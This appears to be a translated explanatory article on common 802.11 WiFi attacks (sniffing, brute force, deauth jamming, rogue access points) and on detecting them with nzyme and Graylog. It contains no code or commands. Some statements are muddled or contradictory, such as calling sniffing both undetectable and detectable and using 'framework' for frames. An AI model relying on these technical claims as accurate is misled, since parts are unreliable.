Common WiFi Attacks and Detection

Common WiFi attacks under the 802.11 standard

Traffic sniffing

Virtually all WiFi traffic can be sniffed with the adapter in monitor mode. Most Linux distributions have support for putting certain WiFi chipsets into this monitor mode, which will process all network traffic.

Encrypted networks are not as secure as you think. WEP encryption and even WPA2-PSK are insecure. An attacker can spoof a deauthentication frame to force a new authentication process, thereby disconnecting your device from the network.

[[252731]]

Since sniffing traffic is done passively and cannot be detected, virtually all open or closed WiFi communications are public, which requires communication encryption at a higher level, such as HTTPs.

Brute Force Access

Like any other password, wireless network passwords can be brute-forced. WEP can be cracked in a matter of minutes by analyzing logged traffic and rendered useless. So for a WPA-secured network, a hacker only needs a standard dictionary attack to achieve their goal.

In fact, most of the brute force cracking tools currently available are designed to target WiFi traffic.

Like traffic sniffing, this method is detectable. The only way to protect yourself is to use a strong password and avoid WEP encryption.

WiFi Network Interference

Under the 802.11 protocol standard, the method of interfering with WiFi networks is simple, which is to fill the relevant communication frequencies with a lot of garbage. The specific process is: using the Deauthentication and Disassociation frameworks.

Because deauth frames are management frames, they are unencrypted and can be modified by anyone, even if they are not connected to the network. By setting the "sender" address in the frame, an attacker can be within range and not only send continuous deauth frames, but also listen to the commands sent by your device. Even a jammer script can monitor the list of all access points and clients, while constantly sending deauth frames to all users.

Detecting Jammers

Tools like nzyme will detect deauth frameworks, and Graylog log monitoring systems can alert on unusual levels of framework subtype fields.

Rogue access points

There are currently two ways for mobile phones to automatically connect to WiFi networks:

1. The beacon frame of the mobile phone can let the mobile workstation know the existence of the network through the beacon sent regularly, so as to adjust the parameters necessary to join the network. In the basic network, the access point must be responsible for sending the beacon frame. The range of the beacon frame is the basic service area. In the basic network, all connections must go through the access point, so the workstation cannot be too far away, otherwise it will not be able to receive the beacon.

2. Through the Probe Request, the mobile workstation will use the Probe Request frame to scan which 802.11 networks are currently in the area. The format of the Probe Request frame is shown in the figure below, and all bits are required.

The probe request frame contains two bits: SSID and the supported rates of the mobile workstation. The workstation that receives the probe request frame will use this to determine whether the other party can join the network. To do this, the mobile workstation must support all data rates required by the network and indicate the network it wants to join with the SSID.

The problem is that any device can send beacon frames and probe request frames for any network. This allows an attacker to use a rogue access point to move around and respond to any request that needs a response, or they can deliberately send beacons for a target corporate network.

Many devices now have corresponding protection mechanisms deployed. If you are about to connect to a previously encrypted but currently unencrypted network, the device will issue a warning reminder. However, if the attacker knows the WiFi password you previously connected to or he is attacking an open network, this protection mechanism will have no effect. If your phone has a malicious access point, the attacker will perform a man-in-the-middle attack, monitor all your communications or launch attacks such as DNS. The attacker can even show you a malicious captive login portal to collect more information about your browser.

Rogue access points are very difficult to identify because it is complex to physically locate them and they are often blended in with existing access point infrastructure. However, they can be detected using tools such as nzyme and Graylog. nzyme is an open source tool that records and forwards management frames under the 802.11 standard to Graylog for WiFi security monitoring and incident response.

5 Ways to Detect Rogue Access Points

Method 1: BSSID whitelist method

Like other network devices, every WiFi access point has a MAC address that is part of every message it sends. The BSSID refers to the MAC address of a station, (STA) on an access point, (AP) in infrastructure mode, and the BSS is defined by the IEEE 802.11-1999 Wireless LAN Specification. This area uniquely defines each BSS. An easy way to detect rogue access points is to keep a list of your trusted access points and their MAC addresses and match them against the MAC addresses you see over the air. However, attackers can easily spoof MAC addresses and bypass this protection.

Method 2: Asynchronous MAC Timestamp

It is important that each access point that generates the same network has a highly synchronized internal clock. This time is in milliseconds, with synchronization increments of 25 microseconds. Most rogue access points tend to make various errors when trying to synchronize timestamps, and you can detect these errors to find malicious hotspots.

Method 3: Wrong channel

You can set up a list to store the channels of all trusted access points, and if the channel is different, it means that the access point is problematic. However, this protection method is also easy for an attacker to bypass: for example, relocate the site and configure the malicious access point to only use channels that have already been used.

Method 4: Encryption downgrade

An attacker who does not know the network password could spin up a rogue access point to open up an open network.

Method 5: Abnormal signal strength

There are many ways to detect rogue access points by analyzing signal strength to look for anomalies. If an attacker is sitting in a parking lot and spoofs an access point, including its MAC address (BSSID), there will be a sudden change in the average signal strength because he is moving away from the sensor (nzyme).